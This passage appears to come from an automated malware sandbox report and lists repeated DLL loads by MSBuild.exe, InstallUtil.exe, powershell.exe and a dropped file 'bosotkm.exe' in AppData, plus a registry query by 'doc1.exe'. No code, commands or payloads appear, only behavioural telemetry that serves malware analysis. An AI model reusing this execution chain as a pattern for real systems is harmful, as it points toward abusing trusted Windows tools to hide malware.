                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Users\user\Desktop\doc1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
